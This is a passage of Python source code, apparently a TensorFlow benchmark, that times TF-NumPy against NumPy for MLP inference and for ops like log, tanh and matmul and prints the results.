fastest_time_us = min(times) * 1e6 / number total_time = sum(times) self.report_benchmark(name=name, wall_time=total_time, extras={'fastest_time_us': fastest_time_us}) return fastest_time_us def benchmark_tf_np_mlp_inference_batch_1_cpu(self): with tf.device('/CPU:0'): model = tf_numpy_mlp.MLP() x = tfnp.ones(shape=(1, 10)).astype(np.float32) self._benchmark_and_report(self._get_name(), lambda: model.inference(x)) def benchmark_tf_np_tf_function_mlp_inference_batch_1_cpu(self): with tf.device('/CPU:0'): model = tf_numpy_mlp.MLP() x = tfnp.ones(shape=(1, 10)).astype(np.float32) self._benchmark_and_report( self._get_name(), tf.function(lambda: model.inference(x))) def benchmark_numpy_mlp_inference_batch_1_cpu(self): model = numpy_mlp.MLP() x = np.random.uniform(size=(1, 10)).astype(np.float32, copy=False) self._benchmark_and_report(self._get_name(), lambda: model.inference(x)) def _benchmark_np_and_tf_np(self, name, op, args, repeat=None): # pylint: disable=redefined-builtin fn = getattr(np, op) assert fn is not None np_time = self._benchmark_and_report( '{}_numpy'.format(name), lambda: fn(*args), repeat=repeat) fn = getattr(tfnp, op) assert fn is not None with tf.device('CPU:0'): tf_time = self._benchmark_and_report( '{}_tfnp_cpu'.format(name), lambda: fn(*args), repeat=repeat) return np_time, tf_time def _print_times(self, op, sizes, times): # For easy reporting. 
print('For np.{}:'.format(op)) print('{:<15} {:>11} {:>11}'.format('Size', 'NP time', 'TF NP Time')) for size, (np_time, tf_time) in zip(sizes, times): print('{:<15} {:>10.5}us {:>10.5}us'.format( str(size), np_time, tf_time)) print() def _benchmark_np_and_tf_np_unary(self, op): sizes = [(100,), (10000,), (1000000,)] repeats = [FLAGS.repeat] * 2 + [10] times = [] for size, repeat in zip(sizes, repeats): x = np.random.uniform(size=size).astype(np.float32, copy=False) name = '{}_{}'.format(self._get_name(), size) times.append(self._benchmark_np_and_tf_np(name, op, (x,), repeat)) self._print_times(op, sizes, times) def benchmark_count_nonzero(self): self._benchmark_np_and_tf_np_unary('count_nonzero') def benchmark_log(self): self._benchmark_np_and_tf_np_unary('log') def benchmark_exp(self): self._benchmark_np_and_tf_np_unary('exp') def benchmark_tanh(self): self._benchmark_np_and_tf_np_unary('tanh') def benchmark_matmul(self): sizes = [(2, 2), (10, 10), (100, 100), (200, 200), (1000, 1000)] # Override repeat flag since this can be very slow. repeats = [FLAGS.repeat] * 3 + [50, 10] times = [] for size, repeat in zip(sizes, repeats): x = np.random.uniform(size=size).astype(np.float32, copy=False) name = '{}_{}'.format(self._get_name(), size) times.append( self._benchmark_np_and_tf_np(name, 'matmul', (x, x), repeat=repeat)) self._print_times('matmul', sizes, times) if __name__ == '__main__': logging.set_verbosity(logging.WARNING) tf.enable_v2_behavior() tf.test.main()